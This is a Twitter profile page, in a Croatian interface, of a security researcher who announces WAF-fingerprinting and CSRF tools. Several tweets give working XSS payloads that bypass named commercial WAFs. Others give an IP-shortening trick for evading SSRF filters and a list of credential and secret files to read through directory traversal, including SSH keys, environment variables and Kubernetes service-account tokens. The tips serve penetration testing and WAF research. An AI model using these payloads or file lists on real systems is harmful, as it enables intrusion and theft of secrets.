Infected Drake

@0xInfection

I am just an Infected Geek... ☣

/dev/null
github.com/0xInfection
Vrijeme pridruživanja: veljača 2018.
40 fotografija ili videozapisa Fotografije i videozapisi

Tweetovi

Blokirali ste korisnika/cu @0xInfection

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @0xInfection

  1. Prikvačeni tweet
    8. srp 2019.

    I learnt today that IP addresses can be shortened by dropping the zeroes. Examples: http://1.0.0.1 → http://1.1 http://192.168.0.1 → http://192.168.1 This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted.

    2.776 proslijeđenih tweetova 6.460 korisnika označava da im se sviđa
    Poništi
  2. 29. sij

    WAFW00F v2.1 is just out! Got a json/csv/txt file having a list of sites which needs to be tested for WAFs? Want a decent output in json/csv? We got you covered! wafw00f -i file.{json|csv|txt} -o file.{txt|csv|json}

    wafw00f v2.1 just released at . We got file input and output now!!1one .. and more WAFs being detected of course, but who's counting? many thanks to and for their work on this one
    17 proslijeđenih tweetova 39 korisnika označava da im se sviđa
    Poništi
  3. 20. sij

    [WAF Bypass Tip] Often WAF devs. include some sort of shared secret as a whitelist string. If the WAF has some kind of open-source version, try going through the source looking for it. Once found, you have the killswitch in your hand. 😎

    1 reply 43 proslijeđena tweeta 102 korisnika označavaju da im se sviđa
    Poništi
  4. proslijedio/la je Tweet
    10. sij

    WAFW00F : Allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website : cc ||

    39 proslijeđenih tweetova 91 korisnik označava da mu se sviđa
    Poništi
  5. proslijedio/la je Tweet
    6. sij

    WAF bypass payload against Firefox by <image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` &lcub;&rcub;'>

    51 proslijeđeni tweet 157 korisnika označava da im se sviđa
    Poništi
  6. 5. sij

    Wooo! Tested this amongst a couple of other WAFs and it bypasses Dotdefender, Comodo and a couple of other WAFs too. Payload seems quite lethal! :) NOTE: Payload seems to be Firefox only. :/

    1 reply 4 proslijeđena tweeta 21 korisnik označava da mu se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  7. 5. sij

    Observed a weird WAF bypass case: > WAF blocked <img> tag > 'src' attr got blocked too > Found WAF didn't block <image> Finally crafted: <image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` &lcub;&rcub;'> > BOOM

    9 replies 238 proslijeđenih tweetova 569 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  8. 3. sij

    Verifying myself: I am 0xinfection on . nKL89qKXoVEXp6-Ahycj_zizwIqQLdQ4Sqy- /

    1 proslijeđeni tweet 4 korisnika označavaju da im se sviđa
    Poništi
  9. 1. sij

    Why not step into the next decade with WAF bypasses? Here are some gifts.😎 - Imperva <a69/onclick=write&lpar;&rpar;>pew - DotDefender <a69/onclick=[0].map(alert)>pew - Cloudbric <a69/onclick=[1].findIndex(alert)>pew Happy 0x32303230.😉

    5 replies 287 proslijeđenih tweetova 675 korisnika označava da im se sviđa
    Poništi
  10. 13. pro 2019.

    If you wish to try it out, get it here: Feedbacks appreciated! :)

    9 proslijeđenih tweetova 26 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  11. 13. pro 2019.

    With more than 300 commits and hard work for the past few months, I am happy to finally announce that WAFW00F v2.0 (Emporium) release is out. WAFW00F can now accurately fingerprint 150+ WAFs out there (largest fingerprint database till now).

    8 replies 137 proslijeđenih tweetova 231 korisnik označava da mu se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    26. velj 2019.

    So as promised, I am open-sourcing my own collection on WAFs as an awesome list. I still feel the collection is pretty incomplete. There is a lot *eyes closed* left to add to it.

    17 replies 459 proslijeđenih tweetova 881 korisnik označava da mu se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  13. 10. stu 2019.

    Hey folks, v2.1.1 of XSRFProbe is out! \o/ So whether you're stuck at an endpoint with forms in it or looking to learn about how cross site request forgeries (CSRF) work, give this toolkit a try. 😉

    1 reply 64 proslijeđena tweeta 99 korisnika označava da im se sviđa
    Poništi
  14. proslijedio/la je Tweet
    28. lis 2019.

    Imperva WAF bypass by <bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click

    1 reply 75 proslijeđenih tweetova 186 korisnika označava da im se sviđa
    Poništi
  15. 26. lis 2019.

    Messed with the WAF a few days ago and crafted some bypasses. Here is an XSS payload which bypasses the Imperva WAF. <bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click P.S. - Didn't expect Imperva to pop so easily. :p

    7 replies 223 proslijeđena tweeta 447 korisnika označava da im se sviđa
    Poništi
  16. 15. lis 2019.

    I wrote up a small script to return a single instance of a URL from a (huge) list of URLs irrespective of their parameter values. Useful in cases where you need to sort out URLs obtained from the wayback machine. Thanks to for the assignment. :)

    Odgovor korisnicima @har1sec @TomNomNom
    There's always a solution out there with . ;D Anyways, I wrote up a small script somehow with my spaghetti coding skills and worked it out within half an hour. Here's the script: You can supply the file with list of URLs with the -f option. :)
    1 reply 9 proslijeđenih tweetova 25 korisnika označava da im se sviđa
    Poništi
  17. 9. lis 2019.

    Need a server which restarts itself after every single request? Set it up using netcat via this one-liner! 😉 while :; do (echo -ne "HTTP/1.1 200 OK\r\nContent-Length: $(wc -c <index.html)\r\n\r\n"; cat index.html) | nc -l -p 8080; done

    144 proslijeđena tweeta 405 korisnika označava da im se sviđa
    Poništi
  18. 4. lis 2019.

    Other interesting files you should have a look: /proc/mounts /proc/net/arp /etc/motd /etc/mysql/my.cnf /proc/net/route /proc/sched_debug /proc/self/environ /home/$USER/.bash_history /home/$USER/.ssh/id_rsa /var/run/secrets/kubernetes.io/serviceaccount /proc/self/cwd/index.php

    5 replies 125 proslijeđenih tweetova 343 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  19. 4. lis 2019.

    Got a directory traversal? Don't forget to check out /proc/[0-9]*/fd/[0-9]* for more juicy info!

    180 proslijeđenih tweetova 475 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  20. 18. kol 2019.

    And a big thanks to for reviewing the article. :)

    7 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  21. 18. kol 2019.

    After weeks of research and experimentation with timing based side channel attacks on WAFs, I'm finally glad to present an article detailing my experiments. I hope you enjoy reading it as much as I enjoyed writing it up. Feedbacks appreciated.

    5 replies 46 proslijeđenih tweetova 117 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi

@0xInfection još nije objavio nijedan Tweet.

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·